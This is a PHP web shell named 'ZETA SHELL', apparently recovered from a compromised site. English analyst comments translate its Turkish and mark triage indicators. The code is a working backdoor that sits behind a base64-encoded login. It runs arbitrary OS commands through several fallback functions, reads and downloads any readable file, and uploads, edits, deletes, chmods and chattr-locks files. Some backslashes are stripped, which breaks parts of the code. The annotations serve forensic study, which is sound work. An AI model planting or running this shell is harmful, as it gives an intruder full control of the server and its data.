File: /home/prospack/public_html/zwso.php
<?php
// Analyst note: this listing is a PHP web shell that calls itself "ZETA SHELL".
// The original comments were in Turkish and are translated here.
@ob_start(); // Start output buffering; the author notes this must come first.
// Debugging is off by default; the author left the switches commented out.
// error_reporting(E_ALL);
// ini_set('display_errors', 1);
// ini_set('log_errors', 1);
// End of debugging switches.
# --- ZETA SHELL configuration ---
$SHELL_VERSION = "";
// Operator credentials, stored base64-encoded. This is encoding, not protection:
// checkLogin() base64-decodes both values before comparing them with the submitted
// form fields, so the login is recoverable from the file itself. The two values are
// identical in this sample and can serve as a string indicator for it.
$_zeta_uk ='bmVzYXM';
$_zeta_ps = 'bmVzYXM';
// --- Session handling ---
// Start a PHP session if none is active; @ suppresses any warning.
if (session_status() == PHP_SESSION_NONE) { @session_start(); }
# --- Login check (obfuscated credentials) ---
/**
 * Login gate for the shell: either lets the request continue or ends it.
 *
 * Both arguments are base64 strings. They are decoded, trimmed and compared with the
 * trimmed POST fields `zeta_user` and `zeta_pass` using ===. On a match the session key
 * `loggedIn` is set to true and the browser is redirected to the same script. Nothing in
 * this function limits or records failed attempts.
 *
 * Triage indicators visible here: POST fields `zeta_user` / `zeta_pass`, session keys
 * `loggedIn`, `message`, `message_type`, and the `logout` query parameter.
 *
 * @param string $kullaniciAdi_encoded Base64-encoded expected user name.
 * @param string $sifre_encoded        Base64-encoded expected password.
 * @return void Returns only when the session is already marked logged in and no
 *              `logout` parameter is present; every other path ends in exit.
 */
function checkLogin($kullaniciAdi_encoded, $sifre_encoded) {
// Decode and trim the configured credentials; @ suppresses decode warnings.
$confUser = trim(@base64_decode($kullaniciAdi_encoded));
$confPass = trim(@base64_decode($sifre_encoded));
// Branch taken while the session is not yet authenticated.
if (!isset($_SESSION['loggedIn']) || $_SESSION['loggedIn'] !== true) {
// A login attempt is a POST that carries both credential fields.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['zeta_user']) && isset($_POST['zeta_pass'])) {
$postUser = trim($_POST['zeta_user']);
$postPass = trim($_POST['zeta_pass']);
if ($postUser === $confUser && $postPass === $confPass) {
$_SESSION['loggedIn'] = true;
$_SESSION['message'] = 'Giriş Başarılı! Kainat Kontrol Paneli Aktif! 🔥';
$_SESSION['message_type'] = 'success';
// Redirect to the same script, keeping the query string but dropping any `logout` key.
$current_uri = $_SERVER['PHP_SELF'];
$query_string = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';
parse_str($query_string, $query_params);
unset($query_params['logout']);
$new_query_string = http_build_query($query_params);
$redirect_url = $current_uri . ($new_query_string ? '?' . $new_query_string : '');
header('Location: ' . $redirect_url);
exit;
} else {
// Wrong credentials: render the form with an error message and stop.
renderLogin('Hatalı Giriş AMK! 🤬'); exit;
}
} else {
// No credentials submitted: render the bare form and stop.
renderLogin(); exit;
}
}
// Authenticated from here on. `?logout` clears the session and reloads the script
// without its query string.
if (isset($_GET['logout'])) {
session_unset(); session_destroy();
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?')); exit;
}
} // end of checkLogin
// --- Login form render function ---
/**
 * Emit the login page and terminate the request.
 *
 * Discards any buffered output, then die()s with a self-contained HTML page. Strings in
 * the page that are useful for content matching: the title "ZETA SHELL LOGIN", the
 * heading "NESAS_0DAY", and the form fields `zeta_user`, `zeta_pass` and `giris`. The
 * page pulls a stylesheet from cdnjs.cloudflare.com and a font from fonts.googleapis.com,
 * so a browser opening it makes those two outbound requests.
 *
 * @param string|null $error_msg Optional message shown above the form; it is inserted
 *                               into the HTML as-is. The callers in this listing pass
 *                               only a fixed string or nothing.
 * @return void Never returns; die() ends the script.
 */
function renderLogin($error_msg = null) {
global $SHELL_VERSION;
// Drop anything already buffered so only the login page is sent.
@ob_end_clean();
die('<!DOCTYPE html><html><head><title>ZETA SHELL LOGIN</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css"><link href="https://fonts.googleapis.com/css2?family=Oxanium:wght@400;700&display=swap" rel="stylesheet"><style>body{margin:0;font-family:'Oxanium',monospace;background-color:#1c2024;color:#f0f4f8;display:flex;justify-content:center;align-items:center;height:100vh;overflow:hidden}#login-screen{z-index:9999;background:#2a3038;padding:40px 50px;border:1px solid #3498db;border-radius:10px;box-shadow:0 10px 30px rgba(0,0,0,.5), 0 0 10px rgba(52,152,219,.3);width:350px;text-align:center;color:#3498db;transform:scale(1);animation:appear .5s ease-out}@keyframes appear{from{opacity:0;transform:scale(.8)}to{opacity:1;transform:scale(1)}}#login-screen h1,h2{margin-top:0;margin-bottom:20px;color:#3498db;text-shadow:0 0 5px rgba(52,152,219,.5)}#login-screen input[type="password"],#login-screen input[type="text"]{width:100%;padding:16px;margin-bottom:25px;background:#1c2024;border:1px solid #4a515c;border-radius:5px;color:#f0f4f8;box-sizing:border-box;font-size:18px;text-align:center;transition:border-color .3s, box-shadow .3s}#login-screen input[type="password"]:focus,#login-screen input[type="text"]:focus{border-color:#3498db;box-shadow:0 0 8px rgba(52,152,219,.5);outline:none}#login-screen input[type="submit"]{width:100%;padding:14px;background:#3498db;color:#1c2024;cursor:pointer;font-weight:700;border:none;border-radius:5px;font-family:'Oxanium',monospace;font-size:18px;transition:background-color .3s ease}#login-screen input[type="submit"]:hover{background:#5dadec}@keyframes pulse-blue{0%{background-color:#004f7f;box-shadow:0 0 5px rgba(52,152,219,.7)}100%{background-color:#006aa3;box-shadow:0 0 10px rgba(52,152,219,.5)}}.login-error{color:#f0f4f8;background-color:#004f7f;padding:12px;border:1px solid #3498db;border-radius:5px;font-weight:700;margin-bottom:20px;animation:pulse-blue 1s infinite 
alternate}</style></head><body><div id="login-screen"><h1><i class="fas fa-terminal"></i> ZETA SHELL ' . $SHELL_VERSION . '</h1><h2>NESAS_0DAY</h2>'.($error_msg ? '<p class="login-error">'.$error_msg.'</p>' : '').'<form method="POST" autocomplete="off"><input type="text" name="zeta_user" placeholder="KULLANICI ADI" required><input type="password" name="zeta_pass" placeholder="ŞİFRE" required><input type="submit" name="giris" value="LOG IN"></form></div></body></html>');
} // end of renderLogin
// Run the login check now, passing the encoded credential variables. checkLogin() exits
// on every unauthenticated path, so the code below this call runs only for a session
// whose `loggedIn` flag is true.
checkLogin($_zeta_uk, $_zeta_ps);
// --- Helper functions ---
/**
 * Render a byte count as a short human-readable size string.
 *
 * Values of 1024 and above are scaled to KB, MB or GB with two decimals; smaller
 * values are printed as "N bytes", "1 byte" or "0 bytes".
 *
 * @param int|float|false|null $bytes Size in bytes; false/null mean "unknown".
 * @return string Formatted size, or '???' when the size is unknown.
 */
function formatSizeUnits($bytes)
{
    if ($bytes === null || $bytes === false) {
        return '???';
    }

    // Largest unit first, so the first threshold reached decides the suffix.
    $scales = array(
        1073741824 => ' GB',
        1048576 => ' MB',
        1024 => ' KB',
    );
    foreach ($scales as $threshold => $suffix) {
        if ($bytes >= $threshold) {
            return number_format($bytes / $threshold, 2) . $suffix;
        }
    }

    if ($bytes > 1) {
        return $bytes . ' bytes';
    }
    if ($bytes == 1) {
        return $bytes . ' byte';
    }
    return '0 bytes';
}
/**
 * Return the lower-cased text after the last dot of a name.
 *
 * Trailing slashes are removed first. A name without any dot yields ''.
 *
 * @param string $file File or directory name.
 * @return string Lower-case extension without the dot, or '' if there is none.
 */
function fileExtension($file)
{
    $name = rtrim($file, '/');
    $dotAt = strrpos($name, '.');

    return $dotAt === false ? '' : strtolower(substr($name, $dotAt + 1));
}
/**
 * Convert a numeric file mode into an ls-style ten-character string.
 *
 * The first character is the file type (s, l, -, b, d, c, p, or u when no type mask
 * matches); the remaining nine are the owner/group/other rwx flags, with s/S and t/T
 * for the setuid, setgid and sticky bits.
 *
 * @param int|false|null $perms Mode bits (presumably from fileperms(); false/null mean unknown).
 * @return string Permission string, or '????' when the mode is unknown.
 */
function perms_to_string($perms)
{
    if ($perms === null || $perms === false) {
        return '????';
    }

    // File-type masks in test order; the first mask fully present in $perms wins.
    $typeMasks = array(
        0xC000 => 's',
        0xA000 => 'l',
        0x8000 => '-',
        0x6000 => 'b',
        0x4000 => 'd',
        0x2000 => 'c',
        0x1000 => 'p',
    );
    $text = 'u';
    foreach ($typeMasks as $mask => $letter) {
        if (($perms & $mask) == $mask) {
            $text = $letter;
            break;
        }
    }

    // One row per class: read bit, write bit, execute bit, special bit, special letter.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't'),
    );
    foreach ($classes as $row) {
        list($readBit, $writeBit, $execBit, $specialBit, $specialChar) = $row;

        $text .= ($perms & $readBit) ? 'r' : '-';
        $text .= ($perms & $writeBit) ? 'w' : '-';

        $hasSpecial = (bool) ($perms & $specialBit);
        if ($perms & $execBit) {
            $text .= $hasSpecial ? $specialChar : 'x';
        } else {
            $text .= $hasSpecial ? strtoupper($specialChar) : '-';
        }
    }

    return $text;
}
/**
 * Encode a filesystem path as unpadded URL-safe base64.
 *
 * This is the encoding of the `p` query parameter used elsewhere in this file, so `p`
 * values seen in access logs can be decoded to the directory that was being browsed.
 *
 * @param string $path Path to encode.
 * @return string Base64 with '+' and '/' replaced by '-' and '_' and trailing '=' removed.
 */
function encodePath($path)
{
    $standard = base64_encode($path);
    $urlSafe = str_replace(array('+', '/'), array('-', '_'), $standard);

    return rtrim($urlSafe, '=');
}
/**
 * Decode a URL-safe base64 string (as produced by encodePath) back into a path.
 *
 * @param string $path URL-safe base64 text, with or without padding.
 * @return string|false Decoded bytes, as returned by base64_decode().
 */
function decodePath($path)
{
    $standard = str_replace(array('-', '_'), array('+', '/'), $path);

    return base64_decode($standard);
}
/**
 * Run an operating-system command through whichever PHP execution function is available.
 *
 * Selection order: shell_exec, system, passthru, exec, proc_open. A function is used when
 * it exists and its name is not found in the `disable_functions` ini value. For the first
 * four, " 2>&1" is appended so stderr is captured with stdout; the proc_open branch passes
 * $cmd unchanged, reads stderr from its own pipe, and runs in PATH when that constant is
 * defined. If none of the five is usable, the output is a fixed "command functions are
 * disabled" message (in Turkish) and retval is -1. retval is only filled in by the
 * system, passthru, exec and proc_open branches; with shell_exec it stays -1.
 *
 * Hardening note: a disable_functions policy stops this helper only if it names all five
 * functions, because each missing name is simply the next fallback. Processes spawned by
 * the PHP worker are the host-level trace of every call made through here.
 *
 * NOTE(review): literals such as "n" in implode() look like escape sequences that lost
 * their backslash when this listing was captured; take byte-exact signatures from the
 * on-disk sample rather than from this text.
 *
 * @param string $cmd Command line to execute.
 * @return array{output:string,retval:int} Trimmed, htmlspecialchars()-escaped output and exit status.
 */
function runCommand($cmd) { $output = ''; $retval = -1; $disabled_funcs = @ini_get('disable_functions'); $use_func = ''; if (function_exists('shell_exec') && stripos($disabled_funcs, 'shell_exec') === false) $use_func = 'shell_exec'; elseif (function_exists('system') && stripos($disabled_funcs, 'system') === false) $use_func = 'system'; elseif (function_exists('passthru') && stripos($disabled_funcs, 'passthru') === false) $use_func = 'passthru'; elseif (function_exists('exec') && stripos($disabled_funcs, 'exec') === false) $use_func = 'exec'; elseif (function_exists('proc_open') && stripos($disabled_funcs, 'proc_open') === false) $use_func = 'proc_open'; try { $cmd_full = $cmd . ' 2>&1'; switch ($use_func) { case 'shell_exec': $output = shell_exec($cmd_full); break; case 'system': ob_start(); system($cmd_full, $retval); $output = ob_get_contents(); ob_end_clean(); break; case 'passthru': ob_start(); passthru($cmd_full, $retval); $output = ob_get_contents(); ob_end_clean(); break; case 'exec': exec($cmd_full, $output_array, $retval); $output = implode("n", $output_array); break; case 'proc_open': $cwd = defined('PATH') ? PATH : null; $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($cmd, $descriptorspec, $pipes, $cwd); if (is_resource($process)) { fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $error = stream_get_contents($pipes[2]); fclose($pipes[2]); $retval = proc_close($process); if (!empty($error)) $output .= "nSTDERR:n" . $error; } else { $output = "proc_open failed."; $retval = -1; } break; default: $output = "KOMUT FONKSIYONLARI KAPALI!"; $retval = -1; break; } } catch (Exception $e) { $output = "Komut hatası: " . $e->getMessage(); $retval = -1; } $trimmed_output = trim(isset($output) ? (string)$output : ''); return array('output' => htmlspecialchars($trimmed_output), 'retval' => $retval); }
/**
 * Test whether a file or directory can be written to.
 *
 * When DIRECTORY_SEPARATOR is '/' and the `safe_mode` ini value is falsy, this is just
 * is_writable(). Otherwise it probes: a missing path is not writable; for a directory it
 * creates a file named after an md5 of two mt_rand() values, chmods it to 0777 and
 * deletes it again; for a file it tries to open it in append mode.
 *
 * @param string $file Path to test.
 * @return bool True when the path is writable by the PHP process.
 */
function is_really_writable($file) { if (DIRECTORY_SEPARATOR == '/' && @ini_get("safe_mode") == FALSE) { return @is_writable($file); } if (!@file_exists($file)) { return false; } if (@is_dir($file)) { $file = rtrim($file, '/') . '/' . md5(mt_rand(1, 100) . mt_rand(1, 100)); if (($fp = @fopen($file, 'w')) === FALSE) { return FALSE; } fclose($fp); @chmod($file, 0777); @unlink($file); return TRUE; } else { if (!($fp = @fopen($file, 'ab'))) { return FALSE; } fclose($fp); return TRUE; } }
/**
 * Return the server's address as reported in $_SERVER.
 *
 * SERVER_ADDR is preferred, LOCAL_ADDR is the fallback.
 *
 * @return string The address, or 'N/A' when neither key is set.
 */
function getServerIP()
{
    foreach (array('SERVER_ADDR', 'LOCAL_ADDR') as $key) {
        if (isset($_SERVER[$key])) {
            return $_SERVER[$key];
        }
    }

    return 'N/A';
}
/**
 * Pick the Font Awesome icon markup shown next to an entry in the file listing.
 *
 * Symlinks and directories (checked against PATH . '/' . $file) are matched first, then
 * the names "error_log", ".htaccess", ".htpasswd", names containing ".conf" or ".ini",
 * and the "env" extension, then the extension lists for code, images, audio, video,
 * archives and documents, then txt/md/log. Anything else gets the default file icon.
 *
 * @param string $file Entry name relative to the current directory (PATH).
 * @return string An <i> element followed by a space.
 */
function fileIcon($file) { $full_path = PATH . '/' . $file; $ext = fileExtension($file); $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp", "ico"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc", "flac", "aac"); $video = array("mp4", "mov", "avi", "mkv", "webm", "flv", "wmv"); $code = array("php", "phtml", "html", "htm", "css", "js", "jsx", "ts", "py", "rb", "java", "c", "cpp", "cs", "go", "swift", "kt", "sh", "bash", "zsh", "sql", "json", "xml", "yaml", "yml", "ini", "conf", "tpl", "twig", "blade"); $archive = array("zip", "rar", "tar", "gz", "7z", "bz2", "xz", "iso", "jar", "tgz", "tbz2"); $doc = array("pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "odt", "ods", "odp", "rtf"); try { if (@is_link($full_path)) return '<i class="fas fa-link hacker-icon-link"></i> '; if (@is_dir($full_path)) return '<i class="fas fa-folder-open hacker-icon-folder"></i> '; } catch(Exception $e) { /* Ignore readlink errors etc. */ } if ($file == "error_log") return '<i class="fas fa-bug hacker-icon-error"></i> '; if ($file == ".htaccess" || $file == ".htpasswd" || strpos($file, '.conf') !== false || strpos($file, '.ini') !== false || $ext == 'env') return '<i class="fas fa-cog hacker-icon-config"></i> '; if (in_array($ext, $code)) return '<i class="fas fa-file-code hacker-icon-code"></i> '; if (in_array($ext, $imgs)) return '<i class="fas fa-file-image hacker-icon-image"></i> '; if (in_array($ext, $audio)) return '<i class="fas fa-file-audio hacker-icon-audio"></i> '; if (in_array($ext, $video)) return '<i class="fas fa-file-video hacker-icon-video"></i> '; if (in_array($ext, $archive)) return '<i class="fas fa-file-archive hacker-icon-archive"></i> '; if (in_array($ext, $doc)) return '<i class="fas fa-file-pdf hacker-icon-doc"></i> '; if ($ext == "txt" || $ext == "md" || $ext == "log") return '<i class="fas fa-file-alt hacker-icon-text"></i> '; return '<i class="fas fa-file hacker-icon-default"></i> '; }
/**
 * Delete a directory and the entries that glob() finds inside it.
 *
 * A trailing slash is added if missing. Each globbed entry is handled by type: symlinks
 * are unlinked rather than followed, directories are handled by a recursive call, and
 * everything else is unlinked. Errors from unlink/rmdir are suppressed with @.
 *
 * @param string $dirPath Directory to remove.
 * @return bool False if $dirPath is not a directory or glob() fails; otherwise the
 *              result of the final rmdir().
 */
function deleteDirRecursive($dirPath) { if (! is_dir($dirPath)) { return false; } if (substr($dirPath, strlen($dirPath) - 1, 1) != '/') { $dirPath .= '/'; } $files = glob($dirPath . '*', GLOB_MARK); if ($files === false) { return false; } foreach ($files as $file) { if (is_link($file)) { @unlink($file); } elseif (is_dir($file)) { deleteDirRecursive($file); } else { @unlink($file); } } return @rmdir($dirPath); }
// --- Determine PATH (the directory the shell operates on) ---
// Default is the directory holding this script.
$script_path = dirname(__FILE__); $doc_root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $script_path; $current_path = $script_path;
// The `p` query parameter, decoded with decodePath(), selects the directory. It is
// accepted when it resolves to a readable directory; nothing here confines it to the
// document root, so the browsable scope is whatever the PHP process can read.
// Otherwise the script directory is used and an error message is queued in the session.
if (isset($_GET['p'])) { $decoded_p = decodePath($_GET['p']); $real_p = @realpath($decoded_p); if ($real_p !== false && @is_dir($real_p) && @is_readable($real_p)) { $current_path = $real_p; } elseif (@is_dir($decoded_p) && @is_readable($decoded_p)) { $current_path = $decoded_p; } else { $current_path = $script_path; $_SESSION['message'] = 'Hata: Yol geçersiz/okunamıyor! (' . htmlspecialchars($decoded_p) . ')'; $_SESSION['message_type'] = 'error'; } } else { $current_path = $script_path; }
// Normalise separators and strip the trailing slash, keeping "/" for the root.
$current_path = str_replace('\', '/', $current_path); if ($current_path !== '/') { $current_path = rtrim($current_path, '/'); } if (empty($current_path)) { $current_path = '/'; }
// PATH is the base for every file operation and for proc_open's working directory.
define("PATH", $current_path);
// --- POST and GET operations ---
// Pull the one-shot status message out of the session and clear it.
$message = isset($_SESSION['message']) ? $_SESSION['message'] : ''; $message_type = isset($_SESSION['message_type']) ? $_SESSION['message_type'] : ''; unset($_SESSION['message'], $_SESSION['message_type']);
// Text produced by the POST handlers that do not redirect.
$action_result_output = '';
// Name of the section a handler was run from (set to e.g. 'files', 'command').
$opened_details = '';
/**
 * Queue a status message in the session and redirect back to a directory view.
 *
 * The redirect target is `?p=` followed by the encodePath() form of the directory, so
 * most POST actions in this file are answered with a redirect to a `?p=...` URL.
 *
 * @param string      $msg              Message text to show after the redirect.
 * @param string      $type             Message class; callers pass 'success', 'error' or 'info'.
 * @param string|null $path_to_redirect Directory to return to; PATH when empty.
 * @return void Never returns; the request ends with exit.
 */
function set_message_and_redirect($msg, $type, $path_to_redirect = null) {
$_SESSION['message'] = $msg;
$_SESSION['message_type'] = $type;
$redirect_url = '?p=' . urlencode(encodePath($path_to_redirect ?: PATH));
header('Location: ' . $redirect_url); exit;
}
// File download handler, triggered by a GET carrying `dl`, `file` and `p`.
// The target is <decoded p>/<url-decoded file>; any regular file readable by the PHP
// process is streamed back as an attachment. Because this is a GET, the three
// parameters are normally present in web server access logs, and `p` can be decoded
// from URL-safe base64 to see which directory the file came from.
if (isset($_GET['dl']) && isset($_GET['file']) && isset($_GET['p'])) {
$dl_path = decodePath($_GET['p']);
$file_to_download = urldecode($_GET['file']);
$file_path = rtrim($dl_path, '/') . "/" . $file_to_download;
if (!is_file($file_path)) {
// Not a regular file: queue an error and go back to the directory view.
set_message_and_redirect('Hata: İndirilecek öğe dosya değil!', 'error', $dl_path);
} elseif (!is_readable($file_path)) {
// Unreadable file: queue an error and go back to the directory view.
set_message_and_redirect('Hata: Dosya okunamıyor, indirilemez!', 'error', $dl_path);
} else {
// Generic binary download headers; the offered file name is the base name of the path.
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file_path) . '"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file_path));
// Clear the output buffer so only the file bytes are sent, then stream the file.
@ob_clean(); @flush(); @readfile($file_path);
exit;
}
}
// File read handler, triggered by a GET carrying `ajax_get_content`, `file` and `p`.
// Returns the content of <decoded p>/<url-decoded file> as JSON. Like the download
// handler it is a GET, so requests are visible in access logs with the file name in
// clear and the directory in URL-safe base64.
if (isset($_GET['ajax_get_content']) && isset($_GET['file']) && isset($_GET['p'])) {
header('Content-Type: application/json');
$ajax_path = decodePath($_GET['p']);
$ajax_file = urldecode($_GET['file']);
$full_ajax_path = rtrim($ajax_path, '/') . '/' . $ajax_file;
if (!file_exists($full_ajax_path) || !is_file($full_ajax_path)) {
// Error text: "No such file!"
echo json_encode(['success' => false, 'error' => 'Dosya yok!']);
} elseif (!is_readable($full_ajax_path)) {
// Error text: "Not readable!"
echo json_encode(['success' => false, 'error' => 'Okunamıyor!']);
} else {
$content = @file_get_contents($full_ajax_path);
if ($content === false) {
// Error text: "Read error!"
echo json_encode(['success' => false, 'error' => 'Okuma hatası!']);
} else {
// Convert to UTF-8 from the detected encoding (UTF-8, ISO-8859-9 or ISO-8859-1)
// before JSON-encoding the content.
$content_utf8 = mb_convert_encoding($content, 'UTF-8', mb_detect_encoding($content, 'UTF-8, ISO-8859-9, ISO-8859-1', true));
echo json_encode(['success' => true, 'filename' => htmlspecialchars($ajax_file), 'content' => $content_utf8]);
}
}
exit;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// POST `upload`: moves the uploaded file `fileToUpload` into the current directory (PATH)
// under the base name supplied by the client. No type or extension check is applied, so
// this is a file-drop capability; files that appear next to the shell after multipart
// POSTs to it belong in the incident scope. The error table maps PHP upload error codes
// to short Turkish messages.
if (isset($_POST["upload"])) { if(isset($_FILES["fileToUpload"]) && $_FILES["fileToUpload"]["error"] == UPLOAD_ERR_OK) { $target_file = PATH . "/" . basename($_FILES["fileToUpload"]["name"]); if (!is_really_writable(PATH)) { $msg='Hata: Dizin yazılamıyor!'; $type='error'; } elseif (@move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { $msg = htmlspecialchars(basename($_FILES["fileToUpload"]["name"])).' yüklendi! 😉'; $type='success'; } else { $msg='Hata: Yüklenemedi!'; $type='error'; } } else { $upload_error = isset($_FILES["fileToUpload"]["error"]) ? $_FILES["fileToUpload"]["error"] : UPLOAD_ERR_NO_FILE; $php_upload_errors = array( UPLOAD_ERR_INI_SIZE=>'php.ini limit!', UPLOAD_ERR_FORM_SIZE=>'Form limit!', UPLOAD_ERR_PARTIAL=>'Yarım!', UPLOAD_ERR_NO_FILE=>'Dosya yok!', UPLOAD_ERR_NO_TMP_DIR=>'Tmp yok!', UPLOAD_ERR_CANT_WRITE=>'Yazılamadı!', UPLOAD_ERR_EXTENSION=>'Eklenti engeli!'); $error_message = isset($php_upload_errors[$upload_error]) ? $php_upload_errors[$upload_error] : 'Bilinmeyen hata.'; $msg = 'Hata: ' . $error_message; $type='error'; } set_message_and_redirect($msg, $type, PATH); }
// POST `rename`: renames PATH/original_name to PATH/new_name. Both names are used as
// submitted (no basename()), so the affected paths are not necessarily inside PATH.
elseif (isset($_POST['rename'])) { $original_path = PATH . "/" . $_POST['original_name']; $new_path = PATH . "/" . $_POST['new_name']; if (!file_exists($original_path)) { $msg='Hata: Orijinal yok!'; $type='error'; } elseif (empty(trim($_POST['new_name']))) { $msg='Hata: Yeni isim boş!'; $type='error'; } elseif ($original_path === $new_path) { $msg='İsimler aynı!'; $type='info'; } elseif (@rename($original_path, $new_path)) { $msg='Yeniden adlandırıldı! 😎'; $type='success'; } else { $msg='Hata: Adlandırılamadı! İzin? 🖕'; $type='error'; } set_message_and_redirect($msg, $type, PATH); }
// POST `edit`: overwrites PATH/file_to_save with the POST field `data`. This is the
// in-place modification path for existing site files; when scoping an incident, compare
// writable files against known-good copies rather than assuming only new files changed.
elseif(isset($_POST['edit'])) { $filename = PATH."/".$_POST['file_to_save']; if (!is_really_writable($filename)) { $msg='Hata: Dosya yazılamıyor!'; $type='error'; } else { $data = $_POST['data']; if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { $data = stripslashes($data); } if(@file_put_contents($filename, $data) !== false) { $msg='Dosya kaydedildi! ✅'; $type='success'; } else { $msg='Hata: Kaydedilemedi! ❌'; $type='error'; } } set_message_and_redirect($msg, $type, PATH); }
// POST `delete_item`: deletes PATH/item_name. Symlinks and regular files are unlinked;
// directories go through deleteDirRecursive(). The outcome is reported via redirect.
elseif (isset($_POST['delete_item'])) { $item_to_delete = $_POST['item_name']; $item_path = PATH . "/" . $item_to_delete; $success = false; $error_msg = 'Bilinmeyen silme hatası!'; if (!file_exists($item_path)) { $error_msg = 'Öğe bulunamadı!'; } elseif (is_link($item_path)) { if (@unlink($item_path)) { $success = true; $msg = 'Link SİLİNDİ!'; } else { $error_msg = 'Link silinemedi!'; } } elseif (is_file($item_path)) { if (@unlink($item_path)) { $success = true; $msg = 'Dosya SİLİNDİ!'; } else { $error_msg = 'Dosya silinemedi!'; } } elseif (is_dir($item_path)) { try { if (deleteDirRecursive($item_path)) { $success = true; $msg = 'Dizin ve içindekiler SİLİNDİ! 🔥'; } else { $error_msg = 'Dizin silinemedi! İzin?'; } } catch (Exception $e) { $error_msg = 'Hata: ' . $e->getMessage(); } } if ($success) { set_message_and_redirect($msg, 'success', PATH); } else { set_message_and_redirect('Hata: ' . $error_msg, 'error', PATH); } }
// POST `chmod_item`: changes the mode of PATH/item_name. `new_perm` must be three or
// four octal digits; it is converted with octdec() and applied with chmod().
elseif (isset($_POST['chmod_item'])) { $file_to_chmod = PATH . '/' . $_POST['item_name']; $new_perm_str = $_POST['new_perm']; if (!file_exists($file_to_chmod)) { $msg='Hata: Öğe yok!'; $type='error'; } elseif (!preg_match('/^[0-7]{3,4}$/', $new_perm_str)) { $msg='Hata: Geçersiz izin formatı!'; $type='error'; } else { $new_perm = octdec($new_perm_str); if (@chmod($file_to_chmod, $new_perm)) { $msg = 'İzinler ' . sprintf('%04o', $new_perm) . ' oldu! 🔧'; $type = 'success'; } else { $msg = 'Hata: Chmod başarısız!'; $type = 'error'; } } set_message_and_redirect($msg, $type, PATH); }
// POST `chattr_item`: runs `chattr +i` (attr_action == 'lock') or `chattr -i` on
// PATH/item_name through runCommand(), i.e. sets or clears the immutable attribute.
// Cleanup note: a file that cannot be removed or edited during remediation may carry
// this attribute; `lsattr` shows it.
elseif (isset($_POST['chattr_item'])) { $file_to_chattr = PATH . '/' . $_POST['item_name']; $attr_cmd = $_POST['attr_action'] == 'lock' ? '+i' : '-i'; $command = "chattr " . $attr_cmd . " " . escapeshellarg($file_to_chattr); $cmd_result = runCommand($command); if (stripos($cmd_result['output'], 'Operation not permitted') === false && stripos($cmd_result['output'], 'No such file') === false && stripos($cmd_result['output'], 'command not found') === false && $cmd_result['retval'] <= 1) { $msg = 'chattr ' . $attr_cmd . ' denendi. 😎'; $type = 'success'; } else { $msg = 'Hata: chattr başarısız: ' . $cmd_result['output']; $type = 'error'; } set_message_and_redirect($msg, $type, PATH); }
// POST `create_item`: creates PATH/item_name as an empty file (item_type 'file', via
// touch) or a directory with mode 0755 (item_type 'dir', via mkdir). Empty names and
// already existing targets are rejected.
elseif (isset($_POST['create_item'])) { $item_name = trim($_POST['item_name']); $item_type = $_POST['item_type']; if (empty($item_name)) { $msg='Hata: İsim boş!'; $type='error'; set_message_and_redirect($msg, $type, PATH);} else { $new_item_path = PATH . '/' . $item_name; if (file_exists($new_item_path)) { $msg='Hata: Zaten var!'; $type='error'; set_message_and_redirect($msg, $type, PATH); } else { $success = false; $error_msg = 'Oluşturma hatası!'; if ($item_type == 'file') { if (@touch($new_item_path)) { $success = true; $msg = 'Dosya yaratıldı!'; } else { $error_msg = 'Dosya yaratılamadı!'; } } elseif ($item_type == 'dir') { if (@mkdir($new_item_path, 0755)) { $success = true; $msg = 'Dizin yaratıldı!'; } else { $error_msg = 'Dizin yaratılamadı!'; } } if ($success) { set_message_and_redirect($msg, 'success', PATH); } else { set_message_and_redirect('Hata: ' . $error_msg, 'error', PATH); } } } }
// POST `archive_item`: packs item_name with `zip -r` or `tar -czvf` through runCommand(),
// naming the result item_name plus ".zip" or ".tar.gz". Archives that appear in
// web-served directories are worth checking for as staged data during an investigation.
elseif (isset($_POST['archive_item'])) { $item_name = $_POST['item_name']; $item_path = PATH . "/" . $item_name; $archive_type = $_POST['archive_type']; $archive_name = $item_name . '.' . $archive_type; $cmd = ''; if (!file_exists($item_path)) { $msg='Hata: Öğe yok!'; $type='error'; } else { if ($archive_type == 'zip') { $cmd = "zip -r " . escapeshellarg($archive_name) . " " . escapeshellarg($item_name); } elseif ($archive_type == 'tar') { $archive_name .= '.gz'; $cmd = "tar -czvf " . escapeshellarg($archive_name) . " " . escapeshellarg($item_name); } if ($cmd) { $result = runCommand($cmd); if ($result['retval'] == 0) { $msg = $archive_name . ' oluşturuldu! 📦'; $type = 'success'; } else { $msg = 'Hata: Arşivlenemedi! ' . $result['output']; $type = 'error'; } } else { $msg = 'Hata: Geçersiz tür.'; $type = 'error'; } } set_message_and_redirect($msg, $type, PATH); }
// POST `extract_item`: unpacks PATH/item_name into PATH through runCommand(), choosing
// unzip, tar (plain, gzip or bzip2) or unrar from the file extension.
